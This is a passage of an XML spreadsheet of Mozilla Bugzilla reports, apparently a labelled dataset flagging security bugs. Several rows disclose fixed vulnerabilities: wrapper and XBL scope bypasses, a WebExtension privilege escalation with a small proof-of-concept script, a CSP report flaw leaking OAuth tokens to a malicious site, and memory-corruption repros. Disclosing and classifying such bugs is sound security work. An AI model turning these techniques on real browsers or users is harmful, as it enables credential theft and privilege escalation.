- Firefox Nightly 127.0a1 (2024-04-24) (64-bit) on Arch Linux (X11)
- Firefox Beta 126.0b5 (64-bit) on Arch Linux (X11)
## Steps to reproduce:
1. Visit attached testcase.html
2. When Print dialog is appear
3. Click Save
4. Save the PDF file to destination path
5. After a seconds the entire browser crashed</t>
        </is>
      </c>
      <c r="X2959" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2960">
      <c r="A2960" t="n">
        <v>443696</v>
      </c>
      <c r="B2960" t="inlineStr">
        <is>
          <t>2008-07-04 23:41:04 -0700</t>
        </is>
      </c>
      <c r="C2960" t="inlineStr">
        <is>
          <t>Add ability to change the passphrase</t>
        </is>
      </c>
      <c r="D2960" t="inlineStr">
        <is>
          <t>2018-09-24 14:26:41 -0700</t>
        </is>
      </c>
      <c r="E2960" t="n">
        <v>1</v>
      </c>
      <c r="F2960" t="n">
        <v>1</v>
      </c>
      <c r="G2960" t="n">
        <v>2</v>
      </c>
      <c r="H2960" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I2960" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J2960" t="inlineStr">
        <is>
          <t>Sync</t>
        </is>
      </c>
      <c r="K2960" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2960" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2960" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2960" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2960" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2960" t="inlineStr"/>
      <c r="Q2960" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2960" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2960" t="inlineStr">
        <is>
          <t>0.5</t>
        </is>
      </c>
      <c r="T2960" t="n">
        <v>1</v>
      </c>
      <c r="U2960" t="n">
        <v>6</v>
      </c>
      <c r="V2960" t="n">
        <v>27</v>
      </c>
      <c r="W2960" t="inlineStr">
        <is>
          <t>Add the ability to change the passphrase.  If the user does not know their old passphrase, this requires deleting all content on the server and re-syncing with a new passphrase.
If they do know their passphrase, Weave could theoretically re-encrypt the existing content with the new passphrase.  However, we might ignore this case and always do a wipe.</t>
        </is>
      </c>
      <c r="X2960" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2961">
      <c r="A2961" t="n">
        <v>1323381</v>
      </c>
      <c r="B2961" t="inlineStr">
        <is>
          <t>2016-12-13 22:07:18 -0800</t>
        </is>
      </c>
      <c r="C2961" t="inlineStr">
        <is>
          <t>Building Firefox requires 8dot3 filenames ("GetShortPathName returned a long path name. Are 8dot3 filenames disabled?")</t>
        </is>
      </c>
      <c r="D2961" t="inlineStr">
        <is>
          <t>2018-12-27 14:49:51 -0800</t>
        </is>
      </c>
      <c r="E2961" t="n">
        <v>1</v>
      </c>
      <c r="F2961" t="n">
        <v>1</v>
      </c>
      <c r="G2961" t="n">
        <v>7</v>
      </c>
      <c r="H2961" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I2961" t="inlineStr">
        <is>
          <t>Firefox Build System</t>
        </is>
      </c>
      <c r="J2961" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K2961" t="inlineStr">
        <is>
          <t>50 Branch</t>
        </is>
      </c>
      <c r="L2961" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M2961" t="inlineStr">
        <is>
          <t>Windows 7</t>
        </is>
      </c>
      <c r="N2961" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2961" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2961" t="inlineStr"/>
      <c r="Q2961" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R2961" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S2961" t="inlineStr">
        <is>
          <t>mozilla63</t>
        </is>
      </c>
      <c r="T2961" t="n">
        <v>1</v>
      </c>
      <c r="U2961" t="n">
        <v>3</v>
      </c>
      <c r="V2961" t="n">
        <v>29</v>
      </c>
      <c r="W2961" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36
Steps to reproduce:
cd c:/
cd mozilla-source
cd mozilla-central
mach build
Actual results:
$ ./mach build
 0:02.36 c:\mozilla-build\mozmake\mozmake.EXE -f client.mk -s configure
 0:08.99 cd c:/mozilla-source/mozilla-central/obj-i686-pc-mingw32
 0:09.04 c:/mozilla-source/mozilla-central/configure
 0:09.82 Reexecuting in the virtualenv
 0:11.08 checking for a shell... C:/mozilla-build/msys/bin/sh.exe
 0:12.02 checking for host system type... i686-pc-mingw32
 0:12.02 checking for target system type... i686-pc-mingw32
 0:12.02 checking whether cross compiling... no
 0:12.06 checking for the target C compiler...
 0:12.06 DEBUG: _cc: Trying cl
 0:12.06 ERROR: GetShortPathName returned a long path name. Are 8dot3 filenames
disabled?
 0:12.12 *** Fix above errors and then restart with\
 0:12.12                "c:/mozilla-build/mozmake/mozmake.EXE -f client.mk build
"
 0:12.13 client.mk:375: recipe for target 'configure' failed
 0:12.13 mozmake.EXE: *** [configure] Error 1
2
Expected results:
The build should have been completed as per https://developer.mozilla.org/en-US/docs/Mozilla/Developer_guide/Build_Instructions/Windows_Prerequisites. I am a newbie please help.</t>
        </is>
      </c>
      <c r="X2961" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2962">
      <c r="A2962" t="n">
        <v>754044</v>
      </c>
      <c r="B2962" t="inlineStr">
        <is>
          <t>2012-05-10 14:22:31 -0700</t>
        </is>
      </c>
      <c r="C2962" t="inlineStr">
        <is>
          <t>Same-compartment security wrappers can be trivially bypassed by passing them to another compartment</t>
        </is>
      </c>
      <c r="D2962" t="inlineStr">
        <is>
          <t>2013-11-07 11:29:27 -0800</t>
        </is>
      </c>
      <c r="E2962" t="n">
        <v>1</v>
      </c>
      <c r="F2962" t="n">
        <v>1</v>
      </c>
      <c r="G2962" t="n">
        <v>3</v>
      </c>
      <c r="H2962" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2962" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2962" t="inlineStr">
        <is>
          <t>XPConnect</t>
        </is>
      </c>
      <c r="K2962" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2962" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2962" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2962" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2962" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2962" t="inlineStr">
        <is>
          <t>[sg:high][advisory-tracking+][qa?]</t>
        </is>
      </c>
      <c r="Q2962" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2962" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2962" t="inlineStr">
        <is>
          <t>mozilla15</t>
        </is>
      </c>
      <c r="T2962" t="n">
        <v>1</v>
      </c>
      <c r="U2962" t="n">
        <v>0</v>
      </c>
      <c r="V2962" t="n">
        <v>49</v>
      </c>
      <c r="W2962" t="inlineStr">
        <is>
          <t>Sigh. They're totally fucked. I don't know how we didn't think of this before.
JS wrapping doesn't know about SCSWs. So our strategy is just inject them in places like NativeInterface2JSObject, and hope that nobody can actually touch the object.
This works, mostly. Occasionally we find a hole (see bug 737559). But while debugging CPG wrapper reparenting fallout, I realized that there's a simple workaround. Cross-compartment wrappers don't go through SCSWs in most cases, but rather have the filtering policy built directly into them. So when an object is wrapped cross-compartment, the SCSW is stripped off. But when the object is read _back_, the JS engine has no idea that there was ever supposed to be a SCSW there. So it just says "hey, the underlying object here is in the same compartment we're wrapping for. No wrappers needed!"
With compartment-per-global (i.e. Nightly), this is super easy make happen. Just load up a trivial iframe, define the security-checked property on its contentWindow, and read it back again. Boom. I wrote a testcase to confirm that this works.
Without compartment-per-global (i.e. Aurora, Beta, ESR, and Release), it's a tiny bit trickier, since normally an origin only gets one compartment to play with. But this can be easily defeated by making the trivial iframe same-origin via document.domain (rather than by its true origin), which puts it in a separate compartment. I didn't write a testcase for this because it's 11pm and I'm tired, but I don't see why it wouldn't work just as well.
On Nightly, we recently upped the ante by making the Components object protected by SCSWs (bug 735280). So this would in theory give full Components access to web content. But thankfully, I don't think gabor ever got around to removing the old-style CAPS check (did you, gabor?). So I think we're safe there for now. But we're still sitting ducks as far as Location and SOWs are concerned.
So yeah, we need a story here. Pronto.</t>
        </is>
      </c>
      <c r="X2962" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2963">
      <c r="A2963" t="n">
        <v>1883158</v>
      </c>
      <c r="B2963" t="inlineStr">
        <is>
          <t>2024-03-01 15:28:18 -0800</t>
        </is>
      </c>
      <c r="C2963" t="inlineStr">
        <is>
          <t>Potential memory hazard due to AlignedBuffer&amp; AlignedBuffer::operator=(&amp;&amp;)</t>
        </is>
      </c>
      <c r="D2963" t="inlineStr">
        <is>
          <t>2024-09-18 19:37:01 -0700</t>
        </is>
      </c>
      <c r="E2963" t="n">
        <v>1</v>
      </c>
      <c r="F2963" t="n">
        <v>1</v>
      </c>
      <c r="G2963" t="n">
        <v>3</v>
      </c>
      <c r="H2963" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2963" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2963" t="inlineStr">
        <is>
          <t>Audio/Video: Playback</t>
        </is>
      </c>
      <c r="K2963" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2963" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2963" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2963" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2963" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2963" t="inlineStr">
        <is>
          <t>[adv-main125+][adv-esr115.10+]</t>
        </is>
      </c>
      <c r="Q2963" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2963" t="inlineStr">
        <is>
          <t>S3</t>
        </is>
      </c>
      <c r="S2963" t="inlineStr">
        <is>
          <t>125 Branch</t>
        </is>
      </c>
      <c r="T2963" t="n">
        <v>1</v>
      </c>
      <c r="U2963" t="n">
        <v>0</v>
      </c>
      <c r="V2963" t="n">
        <v>12</v>
      </c>
      <c r="W2963" t="inlineStr">
        <is>
          <t>`AlignedBuffer&amp; operator=(&amp;&amp;)` (`dom/media/MediaData.h`) creates an invalid member `UniquePtr&lt;uint8_t[]&gt; mBuffer` on self-move. The bug is that it doesn't check for self-move before calling `~AlignedBuffer()`, which invalidates the entire object. (Following code from `FIREFOX_122_0_RELEASE`):
```
     97:  AlignedBuffer&amp; operator=(AlignedBuffer&amp;&amp; aOther) noexcept {
     98:    this-&gt;~AlignedBuffer();
     99:    new (this) AlignedBuffer(std::move(aOther));
    100:    return *this;
    101:  }
```
Line 99 then constructs a new object from the invalid object using the move constructor:
```
    87:  AlignedBuffer(AlignedBuffer&amp;&amp; aOther) noexcept
    88:      : mData(aOther.mData),
    89:        mLength(aOther.mLength),
    90:        mBuffer(std::move(aOther.mBuffer)),
    91:        mCapacity(aOther.mCapacity) {
    92:    aOther.mData = nullptr;
    93:    aOther.mLength = 0;
    94:    aOther.mCapacity = 0;
    95:  }
```
but the `mBuffer` member:
```
    246:  UniquePtr&lt;uint8_t[]&gt; mBuffer;
```
is never reinitialized, and thus retains the invalid value it received on line 98 (and which got moved to itself on line 90). That value eventually will get used by `~UniquePtr&lt;uint8_t[]&gt;()`, possibly releasing memory it doesn't own.
I don't know whether any code actually does a self-move.
https://bugzilla.mozilla.org/show_bug.cgi?id=1815108 might be related to this bug.</t>
        </is>
      </c>
      <c r="X2963" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2964">
      <c r="A2964" t="n">
        <v>1226423</v>
      </c>
      <c r="B2964" t="inlineStr">
        <is>
          <t>2015-11-19 16:01:59 -0800</t>
        </is>
      </c>
      <c r="C2964" t="inlineStr">
        <is>
          <t>Privilege escalation vulnerabilities in WebExtension APIs</t>
        </is>
      </c>
      <c r="D2964" t="inlineStr">
        <is>
          <t>2018-06-19 13:04:58 -0700</t>
        </is>
      </c>
      <c r="E2964" t="n">
        <v>1</v>
      </c>
      <c r="F2964" t="n">
        <v>1</v>
      </c>
      <c r="G2964" t="n">
        <v>3</v>
      </c>
      <c r="H2964" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2964" t="inlineStr">
        <is>
          <t>WebExtensions</t>
        </is>
      </c>
      <c r="J2964" t="inlineStr">
        <is>
          <t>Untriaged</t>
        </is>
      </c>
      <c r="K2964" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2964" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2964" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2964" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2964" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2964" t="inlineStr">
        <is>
          <t>[adv-main43+]</t>
        </is>
      </c>
      <c r="Q2964" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2964" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2964" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2964" t="n">
        <v>1</v>
      </c>
      <c r="U2964" t="n">
        <v>0</v>
      </c>
      <c r="V2964" t="n">
        <v>31</v>
      </c>
      <c r="W2964" t="inlineStr">
        <is>
          <t>Created attachment 8689803
Testcase add-on
We don't currently check that a document belongs to our extension before injecting APIs into it. In the case of background pages, we also continue injecting APIs into new window globals even after the first load. This means that if a background page navigates to a remote web page, that page has the full privileges of the extension.
The attached testcase has a background page which navigates to https://people.mozilla.org/~kmaglione/webext-privilege-escalation.html, which contains this code:
    dump(`WEBEXT-PRIVILEGE-ESCALATION.HTML\n`);
    dump(`WEBEXT-PRIVILEGE-ESCALATION.HTML: window.browser: ${window.browser &amp;&amp; Object.keys(window.browser).sort()}\n`);
    browser.tabs.query({}, tabs =&gt; {
      dump(`WEBEXT-PRIVILEGE-ESCALATION.HTML: Tab urls: ${Array.from(tabs, t =&gt; t.url).join(" ")}\n`);
    });
And results in this console output:
WEBEXT-PRIVILEGE-ESCALATION.HTML
WEBEXT-PRIVILEGE-ESCALATION.HTML: window.browser: alarms,browserAction,extension,i18n,pageAction,runtime,tabs,test,windows
WEBEXT-PRIVILEGE-ESCALATION.HTML: Tab urls: about:home about:addons</t>
        </is>
      </c>
      <c r="X2964" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2965">
      <c r="A2965" t="n">
        <v>843829</v>
      </c>
      <c r="B2965" t="inlineStr">
        <is>
          <t>2013-02-21 14:31:50 -0800</t>
        </is>
      </c>
      <c r="C2965" t="inlineStr">
        <is>
          <t>XBL scopes can be fooled by invoking XBL functions with non-native arguments</t>
        </is>
      </c>
      <c r="D2965" t="inlineStr">
        <is>
          <t>2014-11-19 19:52:36 -0800</t>
        </is>
      </c>
      <c r="E2965" t="n">
        <v>1</v>
      </c>
      <c r="F2965" t="n">
        <v>1</v>
      </c>
      <c r="G2965" t="n">
        <v>3</v>
      </c>
      <c r="H2965" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2965" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2965" t="inlineStr">
        <is>
          <t>XBL</t>
        </is>
      </c>
      <c r="K2965" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2965" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2965" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2965" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2965" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2965" t="inlineStr">
        <is>
          <t>[adv-main23+] Embargo until EOL ESR17/B2G18</t>
        </is>
      </c>
      <c r="Q2965" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2965" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2965" t="inlineStr">
        <is>
          <t>mozilla23</t>
        </is>
      </c>
      <c r="T2965" t="n">
        <v>1</v>
      </c>
      <c r="U2965" t="n">
        <v>0</v>
      </c>
      <c r="V2965" t="n">
        <v>27</v>
      </c>
      <c r="W2965" t="inlineStr">
        <is>
          <t>This is the root cause of bug 842255. Kudos for moz_bug_r_a4 for the clever test case. TL;DR - This allows clever pages to potentially circumvent the security advantages of XBL scopes and apply some of the same attacks that were possible on trunk before XBL scopes landed.
Generally when privileged code gets its hands on a raw content JS object, it's the result of waiving Xray, and the object has an Xray waiver around it. However, there are cases where privileged code can get its hands on a content JS object without a waiver. The most obvious way to do this is to just do
var withWaiver = contentWindow.wrappedJSObject.someExpando;
var withoutWaiver = XPCNativeWrapper(withWaiver);
In this case, we have |withWaiver != withoutWaiver|, because they're separate object identities. The former transitively applies Xray waivers, while the latter is just biding its time until it finds a native object, at which point Xray vision kicks back in, and content JS objects should theoretically be unreachable again.
One could make the argument that we should have safer behavior here, and that objects without waivers should be opaque. I'm pretty sure that ship has sailed though (if it was ever even in port), and that changing that would break too much. Moreover, we actually rely on it with the XBL scope machinery: when an XBL scope accesses a field off of an bound node with Xray vision, we grab the underlying JS object (since there's not really much else to grab), but specifically avoid waiving Xray, so that Xray vision returns as soon as the caller traverses back to a node. One could make the argument taht this isn't very important behavior to preserve, since clever content can always circumvent it once the caller enters JS.
Anyway. This normally isn't a security problem, because the Xray layer between chrome and content is generally complete modulo instances of waiving. However, in the XBL case we put the wrapped XBL functions on the content-accessible prototype, which content can then invoke. And it can invoke these function with arbitrary JS objects for |this| and the associated arguments, which the XBL generally does not expect.
I can think of two solutions here:
1 - For XBL scopes, make non-waived JS object use an Opaque wrapper rather than a CrossCompartmentWrapper. This would mean that we'd have to deep-waive for field access, but maybe that's ok.
2 - If we decide it's not OK, we could implement a two-tiered system of waiving. One would be deep waiving, which we have right now, and the other would be "just waive until I get back to a native object", which is currently the no-waiver behavior. This would allow us to make the no-waiver behavior opaque. This is probably a fair amount more code than option (1).
Blake, Boris - Can you guys weigh in? Do you think it's ok to deep-waive for field access?</t>
        </is>
      </c>
      <c r="X2965" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2966">
      <c r="A2966" t="n">
        <v>767778</v>
      </c>
      <c r="B2966" t="inlineStr">
        <is>
          <t>2012-06-24 01:57:55 -0700</t>
        </is>
      </c>
      <c r="C2966" t="inlineStr">
        <is>
          <t>Content Security Policy: violation reports leak OAuth 2.0 and OpenID credentials</t>
        </is>
      </c>
      <c r="D2966" t="inlineStr">
        <is>
          <t>2024-05-29 16:01:47 -0700</t>
        </is>
      </c>
      <c r="E2966" t="n">
        <v>1</v>
      </c>
      <c r="F2966" t="n">
        <v>1</v>
      </c>
      <c r="G2966" t="n">
        <v>3</v>
      </c>
      <c r="H2966" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2966" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2966" t="inlineStr">
        <is>
          <t>Security</t>
        </is>
      </c>
      <c r="K2966" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2966" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2966" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2966" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2966" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2966" t="inlineStr">
        <is>
          <t>[advisory-tracking+][qa?]</t>
        </is>
      </c>
      <c r="Q2966" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2966" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S2966" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2966" t="n">
        <v>1</v>
      </c>
      <c r="U2966" t="n">
        <v>0</v>
      </c>
      <c r="V2966" t="n">
        <v>19</v>
      </c>
      <c r="W2966" t="inlineStr">
        <is>
          <t>The Content Security Policy (CSP) violation reports generated by Firefox include sensitive data within the "blocked-uri" parameter. In particular, they include fragment components and query strings even if the blocked-uri has a different origin than the protected resource (violating CSP 1.1 recommendations). Hence, a malicious website may use Firefox's CSP implementation to steal a user's OAuth 2.0 access tokens and OpenID credentials. This leads to serious attacks on popular social authorization servers such as Facebook and Google.
For example, suppose a Yahoo user has previously used "Sign in with Facebook" to log in to Yahoo. 
Suppose also that the user is currently logged in to Facebook (she does not have to be logged in to Yahoo.) 
If she then visits attacker.com, this website can redirect her to Facebook's OAuth 2.0 endpoint, requesting an access token for the current user at Yahoo.
Facebook issues a token and forwards the user to open.login.yahoo.com/#access_token=AAAXXX
The key security mechanism of OAuth 2.0 is that this access token will only be sent to Yahoo, so even if the original token request was sent by an attacker, he will not be able to obtain the access token.
Now, suppose attacker.com had a CSP that forbid connections to open.login.yahoo.com.
Then Firefox will send a CSP violation report to "report-uri" that contains as its "blocked-uri" the full URL open.login.yahoo.com/#access_token=AAAXXX
Hence, the attacker obtains the user's Facebook access token at Yahoo and may download sensitive user information from the Facebook API.
For comparison, Chrome sends a "blocked-uri" that contains only the domain open.login.yahoo.com, avoiding the attack.
A similar attack works for the Facebook OAuth 2.0 authorization code flow, allowing the attacker to steal the auth code and potentially log in as the user on Yahoo.
A similar attack works on the Google OpenID interaction, where the attacker obtains the user's name and email address from Google and also a signed OpenID response that the attacker may potentially use to log in as the user to Yahoo.
Demo:
----
As a proof of concept, we have built an attack webpage that silently retrieves (and stores) any visitor's names and email addresses from Facebook and Google.
The preconditions for this demonstration: the visitor must be logged into Facebook or Google (in the same browser) and must have previously authorized Yahoo to access his Facebook or Google profile (by using Sign in with Facebook for example).
The demo is at http://moscova.inria.fr/~karthik/csp/index.html
Causes and Fixes:
-----------------
The attack shown here was predicted (for a fictionalized version of OAuth) by Adam Barth in http://lists.w3.org/Archives/Public/public-web-security/2011Apr/0055.html
Our demo shows that it is an effective attack on real OAuth and OpenID users,
such as those using the Google, Facebook, Live, LinkedIn, and Dropbox APIs.
The root issue is that Firefox does not implement the recommendations of CSP 1.1 on violation reports (section 4.15). Implementing them would disable the attack above. 
Specifically, Firefox must remove the &lt;fragment&gt; component from the blocked URI. This would prevent Facebook access tokens from being leaked.
Since "the origin of the blocked-uri is not the same as the origin of the protected resource", Firefox should also removes the query string. This would prevent the Google OpenID identifiers from being leaked.
About Us:
--------
I lead a security research group called Prosecco at INRIA in France.
http://prosecco.gforge.inria.fr
Our work focuses on formal security proofs for cryptographic and web applications. We found this attack as part of a formal study of OAuth
http://www.doc.ic.ac.uk/~maffeis/csf12.pdf
We would welcome the opportunity to study any fixes you may propose and incorporate them into our analyses.</t>
        </is>
      </c>
      <c r="X2966" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2967">
      <c r="A2967" t="n">
        <v>1011859</v>
      </c>
      <c r="B2967" t="inlineStr">
        <is>
          <t>2014-05-17 03:24:04 -0700</t>
        </is>
      </c>
      <c r="C2967" t="inlineStr">
        <is>
          <t>Heap memory corruption by navigator.getGamepads()</t>
        </is>
      </c>
      <c r="D2967" t="inlineStr">
        <is>
          <t>2024-05-30 08:34:32 -0700</t>
        </is>
      </c>
      <c r="E2967" t="n">
        <v>1</v>
      </c>
      <c r="F2967" t="n">
        <v>1</v>
      </c>
      <c r="G2967" t="n">
        <v>3</v>
      </c>
      <c r="H2967" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2967" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2967" t="inlineStr">
        <is>
          <t>Hardware Abstraction Layer (HAL)</t>
        </is>
      </c>
      <c r="K2967" t="inlineStr">
        <is>
          <t>31 Branch</t>
        </is>
      </c>
      <c r="L2967" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M2967" t="inlineStr">
        <is>
          <t>Windows 8</t>
        </is>
      </c>
      <c r="N2967" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2967" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2967" t="inlineStr">
        <is>
          <t>[fixed in 32 by bug 996078][adv-main30+]</t>
        </is>
      </c>
      <c r="Q2967" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2967" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2967" t="inlineStr">
        <is>
          <t>mozilla30</t>
        </is>
      </c>
      <c r="T2967" t="n">
        <v>1</v>
      </c>
      <c r="U2967" t="n">
        <v>0</v>
      </c>
      <c r="V2967" t="n">
        <v>34</v>
      </c>
      <c r="W2967" t="inlineStr">
        <is>
          <t>Created attachment 8424311
reproduction case
User Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/537.36
Steps to reproduce:
Run the attached reproduction case (HeapCorrupt_getGamepads_Repro.html) with firefox debug build.
Reproduction case:
&lt;script&gt;
navigator.getGamepads(); 
&lt;/script&gt;
Firefox version:  31.0a1 (2014-04-26), debug build
Operating System:  Windows 8, 64 bit
Actual results:
Windows debug heap reports heap corruptions:
Critical error detected c0000374
firefox.exe has triggered a breakpoint.
First-chance exception at 0x7771AA3C (ntdll.dll) in firefox.exe: 0xC0000374: A heap has been corrupted (parameters: 0x7772FE38).
Unhandled exception at 0x7771AA3C (ntdll.dll) in firefox.exe: 0xC0000374: A heap has been corrupted (parameters: 0x7772FE38).
Stack Trace:
 	ntdll.dll!_RtlReportCriticalFailure@8()	Unknown
 	ntdll.dll!_RtlpReportHeapFailure@4()	Unknown
 	ntdll.dll!_RtlpLogHeapFailure@24()	Unknown
 	ntdll.dll!@RtlpLowFragHeapAllocFromContext@16()	Unknown
 	ntdll.dll!_RtlAllocateHeap@12()	Unknown
 	msvcr120.dll!malloc(unsigned int size) Line 92	C
&gt;	mozalloc.dll!moz_xmalloc(unsigned int size) Line 52	C++
 	xul.dll!nsTArray_base&lt;nsTArrayInfallibleAllocator,nsTArray_CopyWithMemutils&gt;::EnsureCapacity(unsigned int capacity, unsigned int elemSize) Line 119	C++
 	xul.dll!mozilla::dom::Gamepad::Gamepad(nsISupports * aParent, const nsAString_internal &amp; aID, unsigned int aIndex, mozilla::dom::GamepadMappingType aMapping, unsigned int aNumButtons, unsigned int aNumAxes) Line 36	C++
 	xul.dll!mozilla::dom::Gamepad::Clone(nsISupports * aParent) Line 101	C++
 	xul.dll!mozilla::dom::GamepadService::SetWindowHasSeenGamepad(nsGlobalWindow * aWindow, unsigned int aIndex, bool aHasSeen) Line 457	C++
 	xul.dll!mozilla::dom::GamepadService::NewAxisMoveEvent(unsigned int aIndex, unsigned int aAxis, double aValue) Line 287	C++
 	xul.dll!`anonymous namespace'::GamepadEvent::Run() Line 278	C++
 	xul.dll!nsThread::ProcessNextEvent(bool mayWait, bool * result) Line 715	C++
 	xul.dll!NS_ProcessNextEvent(nsIThread * thread, bool mayWait) Line 263	C++
 	xul.dll!mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate * aDelegate) Line 136	C++
 	xul.dll!MessageLoop::RunHandler() Line 223	C++
 	xul.dll!MessageLoop::Run() Line 197	C++
 	xul.dll!nsBaseAppShell::Run() Line 166	C++
 	xul.dll!nsAppShell::Run() Line 188	C++
 	xul.dll!nsAppStartup::Run() Line 279	C++
 	xul.dll!XREMain::XRE_mainRun() Line 4019	C++
 	xul.dll!NS_TableDrivenQI(void * aThis, const nsID &amp; aIID, void * * aInstancePtr, const QITableEntry * entries) Line 17	C++
 	xul.dll!nsComponentManagerImpl::QueryInterface(const nsID &amp; aIID, void * * aInstancePtr) Line 823	C++
 	xul.dll!nsQueryInterface::operator()(const nsID &amp; aIID, void * * answer) Line 19	C++
 	xul.dll!nsCOMPtr_base::assign_from_qi(const nsQueryInterface qi, const nsID &amp; iid) Line 56	C++
Registers:
EAX = 001DF37C EBX = 157EAEB0 ECX = 00000001 EDX = 001DF211 ESI = 00000005 EDI = 11161484 EIP = 60BD1412 ESP = 001DF550 EBP = 00000008 EFL = 00000000 
Expected results:
No heap corruption should happen.</t>
        </is>
      </c>
      <c r="X2967" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2968">
      <c r="A2968" t="n">
        <v>916580</v>
      </c>
      <c r="B2968" t="inlineStr">
        <is>
          <t>2013-09-15 08:13:07 -0700</t>
        </is>
      </c>
      <c r="C2968" t="inlineStr">
        <is>
          <t>Use of uninitialized memory, and buffer size computations not checked for overflow</t>
        </is>
      </c>
      <c r="D2968" t="inlineStr">
